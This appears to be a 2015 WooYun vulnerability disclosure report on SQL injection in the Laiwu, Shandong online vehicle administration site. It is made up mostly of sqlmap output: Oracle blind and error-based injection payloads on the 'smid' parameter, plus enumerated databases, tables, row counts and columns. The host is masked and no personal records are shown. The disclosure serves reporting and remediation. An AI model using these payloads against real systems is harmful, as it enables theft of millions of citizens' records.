漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:山东省莱芜市网上车管所SQL注入漏洞涉及240W详细信息以及大量管理员明文密码
提交时间:2015-12-22 15:16
修复时间:2016-02-07 17:56
公开时间:2016-02-07 17:56
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:已交由第三方合作机构(公安部一所)处理
Tags标签:
无
漏洞详情 披露状态:
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经确认,细节仅向厂商公开 2016-01-04: 细节向核心白帽子及相关领域专家公开 2016-01-14: 细节向普通白帽子公开 2016-01-24: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
简要描述: 山东省莱芜市网上车管所SQL注入漏洞涉及240W详细信息以及大量管理员明文密码
详细说明: 发现一处注入点,太多数据了,240W数据包括个人的详细信息以及大量管理员明文密码等等,就不一一跑出来了。。。。 注入点:**.**.**.**:9080/wscgs/xwl.do?smid=18&bgid=02&bj=8 **.**.**.**:9080/wscgs/xwl.do?smid=18 the SQL query used returns 2402024 entries
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests: --- Parameter: smid (GET) Type: boolean-based blind Title: Oracle boolean-based blind - Parameter replace Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) --- web application technology: JSP back-end DBMS: Oracle sqlmap resumed the following injection point(s) from stored session: --- Parameter: smid (GET) Type: boolean-based blind Title: Oracle boolean-based blind - Parameter replace Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) --- web application technology: JSP back-end DBMS: Oracle sqlmap resumed the following injection point(s) from stored session: --- Parameter: smid (GET) Type: boolean-based blind Title: Oracle boolean-based blind - Parameter replace Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) --- the SQL query used returns 2402024 entries web application technology: JSP back-end DBMS: Oracle available databases [34]: [*] CTXSYS [*] DRV_ADMIN [*] DRV_HEALTH [*] HR [*] LWTJ [*] LWZXSL [*] MDSYS [*] NET [*] ODM [*] ODM_MTR [*] OE [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PM [*] QS [*] QS_CBADM [*] QS_CS [*] QS_ES [*] QS_OS [*] QS_WS [*] QSWEBCGS_USER [*] RMAN [*] SCOTT [*] SH [*] SYS [*] SYSTEM [*] VEH_ADMIN [*] VIO_ADMIN [*] WKSYS [*] WMS_USER [*] WMSYS [*] WSCGS [*] XDB Database: QSWEBCGS_USER [151 tables] +----------------------------+ | ALL_TAB | | CODE | | CODETYPE | | DRIVINGLICENSE_TB | | DRV_EXAMCARD_TB | | DRV_EXAMINATION_SITE_TB | | DRV_FLOW_TB | | DRV_LEARNER_VEHICLE_TB | | DRV_POINTRESET | | DRV_PREASIGN_TB | | DRV_SCHOOLINFO_TB | | DRV_TRAININGRECORDS_BF | | DRV_TRAININGRECORDS_TB | | KSBM_BM | | KSBM_BMRZ | | KSBM_CODE | | KSBM_GLBM | | KSBM_IPCSXZ | | KSBM_JLC | | KSBM_JX | | KSBM_JXJLY | | KSBM_JXPM | | KSBM_KSYY | | KSBM_LLS | | KSBM_QXBM | | KSBM_TS | | KSBM_USER | | KSBM_XZQH | | KSBM_YHQX | | KSBM_YWLX | | LOGS | | MFXX_FLOW | | MFXX_LEARN_INFO | | MFXX_RECORD | | SDGA_EXAMPXJL | | SYS_LOG | | SYS_LOG_PRO | | SYS_MANAGER | | SYS_PARA | | SYS_USER | | SYS_USER_ONLINE | | TAB_COLS | | VEHICLE_TB | | VEHICLE_TEMP_TB | | VEH_FLOW_TB | | VIO_FINE_TB | | VIO_SURVEIL_TB | | VIO_VIOLATION_TB | | WSCGS_BQ | | WSCGS_CODE | | WSCGS_CODERQ | | WSCGS_CODETYPE | | WSCGS_CODEWFDM | | WSCGS_CSSZ | | WSCGS_FWL | | WSCGS_GGDRV | | WSCGS_GGH | | WSCGS_GGVEH | | WSCGS_HPZY_SUPPLY | | WSCGS_JCXYY_BLACKLIST | | WSCGS_JCXYY_JCXDD | | WSCGS_JCXYY_PCSZ | | WSCGS_JCXYY_PREASIGN | | WSCGS_JCXYY_RZ | | WSCGS_JCXYY_SJD | | WSCGS_JCXYY_TZTG | | WSCGS_JCXYY_USER | | WSCGS_JKCSSZ | | WSCGS_JSRZJ_DRV | | WSCGS_JSRZJ_DWUSER | | WSCGS_JSRZJ_HTUSER | | WSCGS_JSRZJ_IDANDDWDH | | WSCGS_JSRZJ_NEWS | | WSCGS_JSRZJ_TZTG | | WSCGS_JSRZJ_VEH | | WSCGS_JSZJ_PERSON | | WSCGS_JXPM | | WSCGS_JXPMH | | WSCGS_JXPMH_TB | | WSCGS_JXPM_TB | | WSCGS_KSYY_DRV_PREASIGN | | WSCGS_KSYY_DRV_PREASIGN_TB | | WSCGS_KSYY_FEEGATE | | WSCGS_KSYY_JXRSSZ | | WSCGS_KSYY_JXRSSZ_TB | | WSCGS_KSYY_KCLX | | WSCGS_KSYY_KSPC | | WSCGS_KSYY_KSPC_TB | | WSCGS_KSYY_PXINFOGATE | | WSCGS_KSYY_PXINFOGATE_TB | | WSCGS_KSYY_PXJLXX | | WSCGS_KSYY_RZ | | WSCGS_KSYY_USER | | WSCGS_KSYY_USER_TB | | WSCGS_KSYY_YYJG | | WSCGS_LY | | WSCGS_MAP | | WSCGS_NEWS | | WSCGS_QQXX | | WSCGS_REGUSER | | WSCGS_RIGHT | | WSCGS_SXFW | | WSCGS_TJBLYW | | WSCGS_TJBLYW_TB | | WSCGS_TJLY_TB | | WSCGS_USERS | | WSCGS_WBXX | | WSCGS_XHBEFORE | | WSCGS_XHBEFORE_COPY | | WSCGS_XHBEFORE_TB | | WSCGS_XHHPHD | | WSCGS_XHHPZY | | WSCGS_XHHPZYBY | | WSCGS_XHHPZY_TB | | WSCGS_XHIPHMD | | WSCGS_XHJKDZ | | WSCGS_XHKXHD | | WSCGS_XHKXHD_TB | | WSCGS_XHPROERR | | WSCGS_XHPRO_SECURITY | | WSCGS_XHPRO_SECURITY_COPY | | WSCGS_XHPRO_STEP | | WSCGS_XHRZ | | WSCGS_XHSYSINFO | | WSCGS_XHSYSINFO_TB | | WSCGS_XHUSER | | WSCGS_XHXD | | WSCGS_XHXD_TB | | WSCGS_XXBG_CODE | | WSCGS_XXBG_GLBM | | WSCGS_XXBG_JDCXX | | WSCGS_XXBG_JDCXXBGRZ | | WSCGS_XXBG_JDCXX_TB | | WSCGS_XXBG_JSRXX | | WSCGS_XXBG_JSRXXBGRZ | | WSCGS_XXBG_JSRXX_TB | | WSCGS_XXBG_PERSON | | WSCGS_XXBG_USER | | WSCGS_XXBG_YHJB | | WSCGS_XXBG_YHXQ | | WSCGS_XXCX_USER | | WSCGS_YQLJ | | WSCGS_ZXYW_LSHP | | WSCGS_ZXYW_LSHPZP | | WSCGS_ZXYW_PLATECLRZ | | WSCGS_ZXYW_PLATEDRV | | WSCGS_ZXYW_PLATEVEH | | WSCGS_ZXYW_PLATEZP | | WSCGS_ZXYW_USER | | WSCGS_ZXYW_WTJY | | WSCGS_ZXYW_WTJYZP | +----------------------------+
漏洞证明:
the SQL query used returns 2402024 entries Database: QSWEBCGS_USER +-------------------------+---------+ | Table | Entries | +-------------------------+---------+ | WSCGS_XHRZ | 2402024 | | SYS_LOG_PRO | 1091760 | | WSCGS_XHPRO_SECURITY | 253322 | | SDGA_EXAMPXJL | 167522 | | LOGS | 38583 | | WSCGS_KSYY_DRV_PREASIGN | 30241 | | SYS_LOG | 18617 | | WSCGS_XHXD | 17961 | | WSCGS_XHHPZY | 9146 | | WSCGS_XHBEFORE_COPY | 6398 | | WSCGS_LY | 2854 | | WSCGS_KSYY_RZ | 1791 | | WSCGS_JCXYY_PCSZ | 1230 | | WSCGS_CODEWFDM | 779 | | WSCGS_REGUSER | 730 | | TAB_COLS | 605 | | WSCGS_KSYY_JXRSSZ | 526 | | WSCGS_NEWS | 480 | | WSCGS_CODE | 409 | | WSCGS_XHBEFORE | 365 | | WSCGS_KSYY_KSPC | 311 | | WSCGS_JSZJ_PERSON | 210 | | WSCGS_XXBG_JSRXX | 125 | | WSCGS_XXBG_JDCXX | 91 | | WSCGS_ZXYW_PLATEZP | 90 | | CODE | 66 | | WSCGS_CODETYPE | 66 | | WSCGS_CODERQ | 64 | | WSCGS_ZXYW_WTJYZP | 63 | | SYS_USER | 58 | | MFXX_FLOW | 54 | | WSCGS_RIGHT | 49 | | WSCGS_ZXYW_WTJY | 31 | | ALL_TAB | 30 | | CODETYPE | 18 | | WSCGS_KSYY_USER | 12 | | WSCGS_XHPROERR | 12 | | WSCGS_ZXYW_PLATEDRV | 12 | | WSCGS_ZXYW_PLATEVEH | 9 | | KSBM_YHQX | 8 | | WSCGS_JCXYY_SJD | 8 | | WSCGS_JCXYY_PREASIGN | 7 | | WSCGS_XHKXHD | 7 | | WSCGS_XXBG_YHXQ | 7 | | WSCGS_XXBG_CODE | 5 | | KSBM_CODE | 4 | | WSCGS_JCXYY_USER | 4 | | WSCGS_KSYY_FEEGATE | 4 | | WSCGS_KSYY_PXINFOGATE | 4 | | WSCGS_KSYY_YYJG | 4 | | WSCGS_JCXYY_JCXDD | 3 | | WSCGS_XHPRO_STEP | 3 | | WSCGS_JCXYY_RZ | 2 | | WSCGS_SXFW | 2 | | WSCGS_USERS | 2 | | WSCGS_WBXX | 2 | | WSCGS_XXBG_YHJB | 2 | | WSCGS_YQLJ | 2 | | KSBM_GLBM | 1 | | KSBM_USER | 1 | | SYS_MANAGER | 1 | | WSCGS_BQ | 1 | | WSCGS_CSSZ | 1 | | WSCGS_FWL | 1 | | WSCGS_JKCSSZ | 1 | | WSCGS_JSRZJ_HTUSER | 1 | | WSCGS_XHJKDZ | 1 | | WSCGS_XHSYSINFO | 1 | | WSCGS_XHUSER | 1 | | WSCGS_XXBG_GLBM | 1 | | WSCGS_XXBG_USER | 1 | | WSCGS_XXCX_USER | 1 | | WSCGS_ZXYW_USER | 1 | +-------------------------+---------+ Database: QSWEBCGS_USER Table: WSCGS_XHRZ [13 columns] +--------+----------+ | Column | Type | +--------+----------+ | BLSJ | DATE | | BZ1 | VARCHAR2 | | BZ2 | VARCHAR2 | | CLSBDH | VARCHAR2 | | CZBZ | VARCHAR2 | | GLBM | VARCHAR2 | | HPHM | VARCHAR2 | | HPZL | VARCHAR2 | | IP | VARCHAR2 | | SFCG | VARCHAR2 | | SID | VARCHAR2 | | YWLX | VARCHAR2 | | YZM | VARCHAR2 | +--------+----------+
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:8
确认时间:2015-12-25 16:01
厂商回复: 感谢提交!! 验证确认所描述的问题,已通知其修复。
最新状态: 暂无